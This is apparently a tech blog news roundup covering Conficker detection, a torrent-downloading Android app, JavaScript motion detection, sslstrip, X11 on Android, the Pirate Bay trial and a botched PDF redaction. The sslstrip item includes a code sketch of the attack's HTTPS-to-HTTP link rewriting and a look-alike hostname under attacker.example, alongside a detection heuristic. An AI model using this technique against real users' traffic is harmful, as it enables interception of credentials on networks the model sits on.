Containing Conficker


With all the noise about Conficker turning your computer into liquid hot magma on April 1st, there’s actually some positive news. Researchers from the Honeynet Project have been following the worm since infections started in late 2008. They recently discovered an easy way to identify infected systems remotely. Conficker patches the MS08-067 vulnerability in memory on the hosts it infects, and its patch handles a crafted request differently from both an unpatched system and an officially patched one, so a single probe distinguishes all three states. Using this knowledge, the team developed a proof of concept network scanner in Python to find infected machines. You can find it in [Rich Mogull]’s initial post. [Dan Kaminsky] has packaged it as an EXE and has instructions for how to build the SVN version of Nmap, which includes the new signature. Other network scanner vendors are adding the code as well.

In conjunction with this detection code, the team has also released the whitepaper Know Your Enemy: Containing Conficker. It discusses ways to detect, contain, and remove Conficker. They’ve combined this with a tool release that covers Conficker’s dynamic domain generation among other things.

Android App Scans Barcodes, Downloads Torrents

[youtube=http://www.youtube.com/watch?v=h05KrEjHW6g]

AndroidAndMe is running a bounty program for Android applications. Users can request a specific application and pledge money to be awarded to the developer who delivers the functional app. [Alec Holmes] just fulfilled the first request by creating Torrent Droid. You can use the app to scan media barcodes and then download the related torrent. It uses the phone’s camera to capture the product’s UPC barcode (similar to Compare Everywhere‘s price lookup) and then searches major torrent sites like The Pirate Bay to find a copy that can be downloaded. After getting the .torrent file, the app can submit it to uTorrent‘s web interface for remote downloading. The app will be released later this month and you can see a screenshot tour of it on Alec’s blog. It’s doubtful that an application like this would ever clear Apple’s App Store approval process.

[via TorrentFreak]

Remote Image Processing In JavaScript

[youtube=http://www.youtube.com/watch?v=u3_cFel26J8]

[Tom] wrote in to tell us about his JavaScript project for motion detection. It ties together two ideas we’ve talked about recently. The first is doing image processing in-browser using the canvas element, which we’ve seen employed in CAPTCHA breaking. The second is offloading heavy processing to browsers, which we saw recently in the MapReduce implementation. [Tom] is using JavaScript to compare consecutive frames and decide whether anything in the scene has moved. He did this as part of MJPG-streamer, a program for streaming images from webcams. It can run on very limited hardware, but image processing can be very intensive. Doing the image processing in the browser makes up for this limitation and means that a custom client program doesn’t have to be written. You can find the code here and a PDF about the proof of concept.
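To make the comparison step concrete, here is an added example (not [Tom]’s code) of frame differencing on two RGBA pixel buffers of the kind the canvas `getImageData()` call returns. In the browser, `prev` and `curr` would be `ctx.getImageData(0, 0, W, H).data` for two consecutive frames drawn onto a canvas; the frames below are constructed by hand so the logic runs offline in Node as well. The thresholds and the 8x8 frame size are illustrative assumptions.

```javascript
// Added example, not [Tom]'s code: frame differencing on two RGBA pixel
// buffers like those canvas getImageData() returns. In the browser, prev
// and curr would be ctx.getImageData(0, 0, W, H).data for two consecutive
// frames; here they are constructed so the logic can be run offline.

// Brightness of the pixel starting at byte offset i (Rec. 601 luma), so
// colour noise from the webcam does not dominate the comparison.
function luma(data, i) {
  return 0.299 * data[i] + 0.587 * data[i + 1] + 0.114 * data[i + 2];
}

// Fraction of pixels whose brightness changed by more than pixelThreshold
// (0..255) between prev and curr, both RGBA buffers of width*height*4 bytes.
function motionFraction(prev, curr, width, height, pixelThreshold) {
  const bytes = width * height * 4;
  if (prev.length !== bytes || curr.length !== bytes) {
    throw new Error("frame size mismatch");
  }
  let changed = 0;
  for (let i = 0; i < bytes; i += 4) {
    if (Math.abs(luma(prev, i) - luma(curr, i)) > pixelThreshold) changed++;
  }
  return changed / (width * height);
}

// Motion is reported only when enough pixels changed, so a few noisy pixels
// or a slight global brightness shift (auto-exposure drift) do not trigger it.
// Thresholds are illustrative assumptions.
function detectMotion(prev, curr, width, height, opts = {}) {
  const { pixelThreshold = 25, minFraction = 0.01 } = opts;
  return motionFraction(prev, curr, width, height, pixelThreshold) > minFraction;
}

// --- constructed sample frames (8x8, grey) ---
function makeFrame(width, height, grey) {
  const buf = new Uint8ClampedArray(width * height * 4);
  for (let i = 0; i < buf.length; i += 4) {
    buf[i] = buf[i + 1] = buf[i + 2] = grey; // R, G, B
    buf[i + 3] = 255;                        // opaque alpha
  }
  return buf;
}

function paintBlock(frame, width, x0, y0, w, h, grey) {
  for (let y = y0; y < y0 + h; y++) {
    for (let x = x0; x < x0 + w; x++) {
      const i = (y * width + x) * 4;
      frame[i] = frame[i + 1] = frame[i + 2] = grey;
    }
  }
}

const W = 8, H = 8;
const prevFrame = makeFrame(W, H, 100);
const objectFrame = makeFrame(W, H, 100);   // same scene with a 2x2 "object"
paintBlock(objectFrame, W, 2, 2, 2, 2, 200);
const noisyFrame = makeFrame(W, H, 110);    // same scene, slightly brighter overall

console.log(motionFraction(prevFrame, objectFrame, W, H, 25)); // 0.0625
console.log(detectMotion(prevFrame, objectFrame, W, H));       // true
console.log(detectMotion(prevFrame, noisyFrame, W, H));        // false
```

The two-stage threshold is the part worth copying: a per-pixel threshold absorbs sensor noise, and a minimum changed fraction absorbs global exposure changes, which is exactly the kind of false positive a webcam stream produces when lighting shifts.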

Sslstrip: Hijacking SSL On The Network

Last week at Black Hat DC, [Moxie Marlinspike] presented a novel way to hijack SSL. You can read about it in this Forbes article, but we highly recommend you watch the video. sslstrip sits between the victim and the web and rewrites all https links as http, but it goes far beyond that. Using Unicode characters that look like / and ?, it can construct a hostname that reads like the victim site’s URL but is really a subdomain of an attacker-controlled domain with a valid certificate, then redirect the user to the real site after stealing their credentials. The attack can be very difficult for even above average users to notice. It requires a man-in-the-middle position on the client’s network path, but [Moxie] successfully ran it on a Tor exit node.
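The core rewriting step is simple enough to show. The block below is an added example, not sslstrip’s own code: it downgrades https links and redirects to http, keeps a record of what was downgraded so the proxy can fetch those pages over HTTPS from the real server, and adds a crude check for the look-alike hostnames described above (anything non-ASCII in the authority part of a URL). The HTML, Location header and homograph URL are constructed samples; `attacker.example` and `bank.example` are placeholder names.

```javascript
// Added example of the link-rewriting step an sslstrip-style proxy performs.
// Not sslstrip's own code: a sketch of the technique on constructed input,
// with the actual proxying of traffic omitted.

// Every URL the proxy downgraded, keyed by host + path, so that when the
// victim later requests it over plain HTTP the proxy knows to fetch it over
// HTTPS from the real server and relay the result in the clear.
const strippedUrls = new Set();

// Rewrite a single absolute https URL to http and remember it.
function downgradeUrl(url) {
  const m = /^https:\/\/(.+)$/i.exec(url);
  if (!m) return url;                      // not https, leave it alone
  strippedUrls.add(m[1]);
  return "http://" + m[1];
}

// Rewrite every https:// link in an HTML body (hrefs, script sources, etc.).
function stripHttpsLinks(html) {
  return html.replace(/https:\/\/[^\s"'<>]+/gi, (url) => downgradeUrl(url));
}

// Same treatment for a Location header on a redirect response.
function stripLocationHeader(location) {
  return downgradeUrl(location.trim());
}

// When the victim's browser follows a downgraded link, pick the scheme the
// proxy should use towards the origin server.
function upstreamUrlFor(host, path) {
  const key = host + path;
  return strippedUrls.has(key) ? "https://" + key : "http://" + key;
}

// Crude check for the second trick in the talk: a hostname containing
// non-ASCII look-alikes of "/" or "?" so the address bar reads like another
// site's URL. Anything non-ASCII in the authority part is flagged.
function hostHasNonAsciiLookalikes(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/?#]*)/i.exec(url);
  if (!m) return false;
  return /[^\x00-\x7f]/.test(m[1]);
}

// Constructed sample page and redirect, as a bank login page might serve.
const SAMPLE_HTML =
  '<a href="https://www.bank.example/login">Log in</a>\n' +
  '<script src="https://cdn.bank.example/app.js"></script>\n' +
  '<a href="http://www.bank.example/help">Help</a>';

const SAMPLE_LOCATION = "https://www.bank.example/account";

// U+2215 (division slash) stands in for "/", so the whole thing is one
// hostname under attacker.example, which a wildcard certificate would cover.
const SAMPLE_HOMOGRAPH_URL =
  "https://www.bank.example\u2215login\u2215secure.attacker.example/";

console.log(stripHttpsLinks(SAMPLE_HTML));
console.log(upstreamUrlFor("www.bank.example", "/login"));   // https://www.bank.example/login
console.log(hostHasNonAsciiLookalikes(SAMPLE_HOMOGRAPH_URL)); // true
```

Note what the victim’s browser sees: every request it makes is plain http, so no certificate warning is ever shown, and the only visible difference is the missing lock icon. The homograph check is a defender’s heuristic, not something the browser did at the time; a real implementation would apply it to the hostname the browser actually resolved rather than to the raw string.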

X11 On Android


[ghostwalker] has put together instructions for running X11 on your Android device. This means you can run a full-blown Linux desktop environment on your phone. It requires you to already have a Debian shell on the phone, which we covered earlier. Instead of having to come up with a custom display driver, it’s hooked to a VNC server. You can connect to it using an Android VNC viewer on the phone or via any other VNC client. The how-to suggests either IceWM or the even lighter-weight LXDE for a window manager. You could potentially install Gnome or KDE, but we’d be surprised if it was any faster than dog slow. Let us know if you have any success with this and what you think the best use is.

Pirate Bay Trial Starts


The first day of The Pirate Bay’s trial has concluded. The prosecution, representing many large media companies, is attempting to prove that the defendants are directly responsible for copyright infringement. The members of The Pirate Bay are treating the trial as a reality TV farce. From TorrentFreak’s coverage, it sounds like it’s off to a great start: “For several minutes, listeners of the live audio could hear mouse-clicks as Roswall [the prosecutor -Ed.], who earlier claimed to be an expert on computer crimes, tried to get his PowerPoint presentation on the screen.”

[via Waxy]

PDF Redaction Still Not Working


Facebook’s internal valuation was revealed this week thanks to shoddy PDF redaction. Court documents from a settlement between Facebook and ConnectU showed that Facebook values itself at $3.7 billion, much less than the $15 billion that was speculated during the Microsoft investment. The AP uncovered this by copying and pasting text out of the redacted court document: the black boxes were drawn over the text rather than the text being removed. It’s the same thing we showed in our PDF redaction screencast last summer… and it will never cease to be funny.

[photo: Bryan Veloso]